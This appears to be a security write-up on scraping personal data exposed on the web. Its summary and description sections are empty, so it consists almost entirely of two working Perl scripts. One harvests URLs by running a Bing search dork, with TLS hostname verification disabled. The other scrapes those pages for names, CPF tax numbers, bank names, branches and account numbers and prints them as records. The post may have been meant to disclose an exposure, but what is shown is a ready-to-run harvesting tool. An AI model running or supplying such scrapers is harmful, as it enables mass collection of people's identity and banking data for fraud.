Heitor Gouvêa
Un pequeño caso de scraping de datos personales expuestos en la web
Resumen
Descripción
Prueba de Concepto
#!/usr/bin/env perl
use 5.030;
use strict;
use warnings;
use WWW::Mechanize;
use Mojo::Util qw(url_escape);
# Search Bing for the dork given as the first command-line argument and print
# every distinct link found on the result pages that looks like an external
# http(s) URL, one per line.
#
# Arguments: none; the dork is read from $ARGV[0].
# Returns:   0 after the result pages have been processed, 1 when no dork was
#            supplied. The script passes this value to exit().
sub main {
    my $dork = $ARGV[0];

    if (!defined $dork || $dork eq '') {
        print STDERR "Usage: $0 <dork>\n";
        return 1;
    }

    my $query = url_escape($dork);
    my %seen;

    my $mech = WWW::Mechanize->new();

    # NOTE(review): TLS hostname verification is switched off here. That makes
    # the requests open to interception; confirm it is really needed.
    $mech->ssl_opts(verify_hostname => 0);

    for my $page (0 .. 10) {
        # "first" is built as "<page>0", i.e. 00, 10, 20, ... 100.
        my $url = "https://www.bing.com/search?q=${query}&first=${page}0";

        # WWW::Mechanize dies on a failed request by default (autocheck).
        # Trap that so one bad page does not throw away the remaining pages.
        if (!eval { $mech->get($url); 1 }) {
            warn "Skipping $url: $@";
            next;
        }

        for my $link ($mech->links()) {
            my $target = $link->url();
            next if !defined $target;

            # Count every link, even filtered ones, so each is examined once.
            next if $seen{$target}++;

            if ($target =~ m/^https?/ && $target !~ m/bing|live|microsoft|msn/) {
                print $target, "\n";
            }
        }
    }

    return 0;
}
# Run main() and use its return value as the process exit status.
exit main();
#!/usr/bin/env perl
use 5.030;
use strict;
use warnings;
use Mojo::DOM;
use Mojo::UserAgent;
# Encode everything written to STDOUT as UTF-8.
binmode(STDOUT, ":encoding(UTF-8)");
# Read URLs (one per line) from the file named by the first command-line
# argument, fetch each one, and for every successful response print the text
# of its "tr td" elements joined with commas, after removing the first
# occurrence of each known column label.
#
# Arguments: none; the file name is read from $ARGV[0].
# Returns:   0 after the whole file has been processed, 1 when no file name
#            was supplied. The script passes this value to exit().
# Dies:      when the URL file cannot be opened.
sub main {
    # The label list below contains non-ASCII literals. Without this pragma
    # they are treated as raw bytes and never match the decoded page text.
    use utf8;

    my $urls_file = $ARGV[0];

    if (!defined $urls_file || $urls_file eq '') {
        print STDERR "Usage: $0 <urls-file>\n";
        return 1;
    }

    my $userAgent = Mojo::UserAgent->new(
        agent => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
    );

    # Column labels to strip from the joined cell text (each followed by ",").
    my @labels = (
        "Nome",
        "CPF",
        "Banco",
        "Tipo da conta",
        "Agência",
        "Conta",
        "Agência Métodos",
    );

    open my $urls_filehandle, "<", $urls_file
        or die "Cannot open $urls_file: $!";

    while (my $url = <$urls_filehandle>) {
        chomp $url;
        next if $url eq '';

        # result() dies on connection errors; trap that so one unreachable
        # URL does not abort the rest of the list.
        my $response = eval { $userAgent->get($url)->result() };
        if (!$response) {
            warn "Skipping $url: $@";
            next;
        }
        next if !$response->is_success();

        my $account = $response->dom->find("tr td")->map("text")->join(",")->to_string;

        # Remove each label independently. Chaining the substitutions with
        # "&&" would stop at the first label that is absent from the page.
        for my $label (@labels) {
            $account =~ s/\Q$label\E,//;
        }

        say $account;
    }

    close($urls_filehandle);

    # Explicit status: otherwise the true value of close() would be returned
    # and the script would exit with 1 on success.
    return 0;
}
# Run main() and use its return value as the process exit status.
exit main();